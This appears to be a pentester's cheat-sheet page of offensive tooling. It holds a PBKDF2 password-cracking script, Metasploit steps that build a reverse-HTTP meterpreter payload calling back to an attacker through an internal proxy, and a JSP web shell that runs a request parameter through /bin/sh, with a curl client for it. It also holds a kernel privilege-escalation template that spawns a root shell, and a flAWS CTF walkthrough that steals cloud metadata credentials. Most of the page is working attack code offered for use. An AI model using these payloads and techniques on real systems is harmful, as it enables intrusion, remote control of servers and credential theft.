# Cracking PBKDF2WithHmacSHA1/160/128000


# cat crack.py
import base64
import hashlib
import sys

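HASH_NAME = 'sha1'
ITERATIONS = 128000
DKLEN = 160 // 8  # 20-byte (160-bit) key; integer division, hashlib rejects a float length

# Layout of the decoded blob as this script slices it: an 8-byte header that is
# not interpreted, an 8-byte salt, then the stored derived key.  In the sample
# on this page the header decodes (big-endian) to 160 and 128000 — the key
# length in bits and the iteration count — which is presumably where the
# constants above come from; they are kept fixed here rather than parsed.
HEADER_LEN = 8
SALT_LEN = 8


def find_match(words, blob, hash_name=HASH_NAME, iterations=ITERATIONS, dklen=DKLEN):
    """Return the first candidate in ``words`` whose PBKDF2 output equals the stored key.

    Args:
        words: iterable of candidate passwords, ``bytes`` or ``str`` (``str``
            is UTF-8 encoded before hashing).
        blob: decoded record laid out as header | salt | derived key.
        hash_name, iterations, dklen: PBKDF2 parameters; the defaults are the
            fixed values the original script hard-coded.

    Returns:
        The matching candidate as ``bytes``, or ``None`` when nothing matches
        (including when ``words`` is empty).
    """
    salt = blob[HEADER_LEN:HEADER_LEN + SALT_LEN]
    secret = blob[HEADER_LEN + SALT_LEN:]
    for word in words:
        if isinstance(word, str):
            word = word.encode('utf-8')
        if hashlib.pbkdf2_hmac(hash_name, word, salt, iterations, dklen) == secret:
            return word
    return None


def main(argv):
    """Run ``crack.py WORDLIST BASE64_BLOB`` (Python 3); print ``BASE64_BLOB WORD`` on a hit.

    Returns 0 on a match, 1 when the wordlist is exhausted, 2 on bad usage.
    """
    if len(argv) != 3:
        sys.stderr.write("usage: %s WORDLIST BASE64_BLOB\n" % argv[0])
        return 2
    wordlist_path, b64e = argv[1], argv[2]
    blob = base64.b64decode(b64e)
    # Binary mode: pbkdf2_hmac wants bytes, and wordlists are often not valid UTF-8.
    with open(wordlist_path, 'rb') as fh:
        words = fh.read().splitlines()
    match = find_match(words, blob)
    if match is None:
        return 1
    print(b64e, match.decode('utf-8', 'replace'))
    return 0


if __name__ == '__main__':
    sys.exit(main(sys.argv))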

# cat dict.txt
test

# python crack.py dict.txt AAAAoAAB9ADMtinzIX3MlHctwKlZd9XHnTgrworaGp3bNFBp
AAAAoAAB9ADMtinzIX3MlHctwKlZd9XHnTgrworaGp3bNFBp test

References

https://en.wikipedia.org/wiki/PBKDF2
https://docs.python.org/3/library/hashlib.html#key-derivation

# Reverse meterpreter through an internal HTTP proxy server


Attacker's host

msf > use payload/python/meterpreter/reverse_http
msf payload(reverse_http) > set lhost LOCAL_PUBLIC_IP
msf payload(reverse_http) > set lport 80
msf payload(reverse_http) > set payloadproxyhost USERNAME:PASSWORD@INTERNAL_PROXY_IP
msf payload(reverse_http) > set payloadproxyport INTERNAL_PROXY_PORT
msf payload(reverse_http) > generate -b '\x00\xff' -t raw -f met.py

msf > use exploit/multi/handler
msf exploit(handler) > set payload python/meterpreter/reverse_http
msf exploit(handler) > set lhost LOCAL_PUBLIC_IP
msf exploit(handler) > set lport 80
msf exploit(handler) > set payloadproxyhost USERNAME:PASSWORD@INTERNAL_PROXY_IP
msf exploit(handler) > set PayloadProxyPort INTERNAL_PROXY_PORT
msf exploit(handler) > run

Compromised server

# python met.py

# JSP webshell


# cat shell.jsp
<%-- Command-execution page (web shell): the `cmd` request parameter is handed
     verbatim to /bin/sh -c and the child's stdout is written into the
     response.  Only stdout is read; stderr and the exit status are dropped,
     and the output stream obtained below is never written to.
     Detection note: a request parameter flowing into Runtime.exec through
     /bin/sh -c is the pattern to alert on in source scans and access logs. --%>
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
String getcmd = request.getParameter("cmd");
if (getcmd != null) {
 //out.println("Command: " + getcmd + "<br>");
 String[] cmd = {"/bin/sh", "-c", getcmd};
 Process p = Runtime.getRuntime().exec(cmd);
 OutputStream os = p.getOutputStream(); // obtained but never used: nothing is sent to the child's stdin
 InputStream in = p.getInputStream(); // child's stdout only; stderr is not captured
 DataInputStream dis = new DataInputStream(in);
 String disr = dis.readLine(); // deprecated API: it does not convert bytes to characters properly
 //out.println("<pre>"); 
 while ( disr != null ) {
  out.println(disr); 
  disr = dis.readLine(); 
 }
 //out.println("</pre>"); 
}
%>
# cat shell.sh
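#!/bin/bash
# Interactive client for shell.jsp: every line typed at the prompt is sent as
# the `cmd` parameter and the response body is echoed.  Typing `exit` ends the
# loop (that word is still sent to the page once before the loop stops, as in
# the original).  Readline editing (-e) plus a private history file in
# ./file_history give command recall across runs.

HISTFILE=./file_history
history -r

input=""

while [ "$input" != "exit" ]; do
 # Stop on EOF (Ctrl-D) instead of looping forever with an empty input.
 read -e -p "> " input || break
 # Quoted: unquoted, $input would be word-split and glob-expanded before it
 # is recorded, so a line like `ls *` would be stored as the expanded list.
 history -s "$input"
 # -k disables TLS certificate verification, so everything in this session
 # can be intercepted on the way to DOMAIN; the cookies stand in for whatever
 # the target session requires.
 curl -k --cookie 'VAR1=VALUE1' --cookie 'VAR2=VALUE2' --data-urlencode "cmd=$input" https://DOMAIN/DIR/shell.jsp
done

history -a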

# Kernel exploit template


# cat kernel_exploit.tpt
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Function-pointer types for the two kernel credential helpers the template
 * resolves at run time.  regparm(3) passes the first three arguments in
 * registers; NOTE(review): that presumably matches how 32-bit x86 kernels are
 * built and has no effect on x86-64 — confirm for the target architecture.
 */
typedef int __attribute__((regparm(3))) (*commit_creds_t)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_t)(unsigned long cred);

/* Filled in by main() from /proc/kallsyms; zero-initialised (NULL) until then. */
prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;

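/*
 * Resolve a kernel symbol's address by name from /proc/kallsyms.
 *
 * Each line is "ADDRESS TYPE NAME [module]".  Lines are read with fgets so
 * the optional module suffix is simply ignored; the original fscanf loop
 * stopped at the first such line, because after "%s" consumed NAME the next
 * "%p" failed on "[module]" and the "> 0" test ended the scan.  The "%511s"
 * width keeps an overlong name from overflowing sym[] (a line longer than the
 * line buffer is split and will not match), and the file is closed on every
 * path.
 *
 * Returns the address, or NULL when the file cannot be opened, no line
 * matches, or the address was printed as zero (kptr_restrict hides addresses
 * from unprivileged readers that way, so NULL is ambiguous).
 */
void *get_ksym(const char *name) {
 FILE *f = fopen("/proc/kallsyms", "rb");
 char line[1024];
 char c, sym[512];
 void *addr;
 void *found = NULL;

 if (f == NULL)
  return NULL;

 while (fgets(line, sizeof line, f) != NULL) {
  if (sscanf(line, "%p %c %511s", &addr, &c, sym) == 3 && strcmp(sym, name) == 0) {
   found = addr;
   break;
  }
 }

 fclose(f);
 return found;
}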

/*
 * Payload body: grants the calling task root credentials by calling
 * commit_creds(prepare_kernel_cred(0)) through the pointers main() resolved.
 * Per the placeholder comments in main() it is meant to be reached by a
 * kernel-mode control-flow hijack; if either lookup failed the pointer is
 * still NULL and the call crashes.
 */
void get_root() {
 commit_creds(prepare_kernel_cred(0));
}

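/*
 * Template entry point: resolve the two credential helpers, print their
 * addresses, leave a placeholder for the bug-specific trigger, then spawn a
 * shell only if the process ended up as uid 0.
 *
 * Returns 0 normally, 1 when a symbol could not be resolved — the placeholder
 * section is skipped in that case rather than calling through NULL.
 */
int main(int argc, char *argv[]) {
 (void)argc;
 (void)argv;

 prepare_kernel_cred = get_ksym("prepare_kernel_cred");
 commit_creds = get_ksym("commit_creds");

 printf("[+] addr prepare_kernel_cred: %p\n", prepare_kernel_cred);
 printf("[+] addr commit_creds: %p\n", commit_creds);
 printf("[+] addr get_root: %p\n", get_root);

 /* get_ksym() yields NULL both when /proc/kallsyms is unreadable and when the
  * kernel shows zeroed addresses to unprivileged readers. */
 if (prepare_kernel_cred == NULL || commit_creds == NULL) {
  fprintf(stderr, "[-] could not resolve kernel symbols\n");
  return 1;
 }

 // == Exploit code ==
 // Buffer overflow
 //   EIP = get_root
 // Null pointer dereference
 //   mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
 //   memcpy(mem, get_root, 0x1000);

 /* Only hand over a shell if the placeholder above actually elevated us. */
 if (!getuid()) {
  char *shell = "/bin/sh";
  char *args[] = {shell, "-i", NULL};
  execve(shell, args, NULL);
  perror("execve"); /* only reached if the exec itself failed */
 }

 return 0;
}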

# flAWS challenge


Level 1: Directory (bucket) listing - Everyone

# # --no-sign-request: Do not sign requests. Credentials will not be loaded if this argument is provided.
# # --region (string): The region to use. Overrides config/env settings.
# aws --no-sign-request --region us-west-2 s3 ls s3://flaws.cloud/
# aws --no-sign-request --region us-west-2 s3 cp s3://flaws.cloud/secret-dd02c7c.html .
# cat secret-dd02c7c.html

Level 2: Directory (bucket) listing - Any authenticated AWS user

# aws --profile level2 configure
# aws s3 --profile level2 --region us-west-2 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
# aws s3 --profile level2 --region us-west-2 cp s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html .
# cat secret-e4443fc.html

Level 3: AWS keys leaked

# aws s3 --no-sign-request --region us-west-2 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
# aws s3 --no-sign-request --region us-west-2 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git .git
# git log
# git checkout f7cebc46b471ca9838a0bdd1074bb498a3f84c87
# cat secret
# aws --profile level3 configure
# aws --profile level3 s3 ls

Level 4: Public snapshot as a backup

# aws --profile level3 --region us-west-2 sts get-caller-identity
# aws --profile level3 --region us-west-2 ec2 describe-snapshots --owner-id 975426262029
# aws --profile level2 --region us-west-2 ec2 create-volume --availability-zone us-west-2a --snapshot-id snap-0b49342abd1bdcb89
# aws --profile level2 ec2 describe-volumes --region=us-west-2
# aws --profile level2 --region us-west-2 ec2 create-security-group --group-name devenv-sg --description 'My security group'
# aws --profile level2 --region us-west-2 ec2 authorize-security-group-ingress --group-name devenv-sg --protocol tcp --port 22 --cidr 0.0.0.0/0
# aws --profile level2 --region us-west-2 ec2 create-key-pair --key-name devenv-key --query 'KeyMaterial' --output text > devenv-key.pem
# aws --profile level2 --region us-west-2 ec2 run-instances --image-id ami-29ebb519 --security-group-ids sg-xxxxxxxx --count 1 --instance-type t1.micro --key-name devenv-key --query 'Instances[0].InstanceId'
# ssh -i devenv-key.pem ubuntu@ip
# mount /dev/xvdb1 /mnt
# cat /mnt/home/ubuntu/setupNginx.sh

Level 5: Metadata at 169.254.169.254

# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws
# echo "aws_session_token = xx" >> .aws/credentials
# aws --profile level5 s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud

Level 6: SecurityAudit policy attached

# aws --profile level6 configure
# aws --profile level6 --region us-west-2 iam get-user
# aws --profile level6 --region us-west-2 iam list-attached-user-policies --user-name Level6
# aws --profile level6 --region us-west-2 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
# aws --profile level6 --region us-west-2 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
# aws --profile level6 --region us-west-2 lambda list-functions
# aws --profile level6 --region us-west-2 lambda get-policy --function-name Level6
# aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id 's33ppypa75'
# restapiid='s33ppypa75'
# region='us-west-2'
# stagename='Prod'
# functionname='level6'
# curl -k https://$restapiid.execute-api.$region.amazonaws.com/$stagename/$functionname

Reference

https://summitroute.com/blog/2017/02/26/flaws_challenge/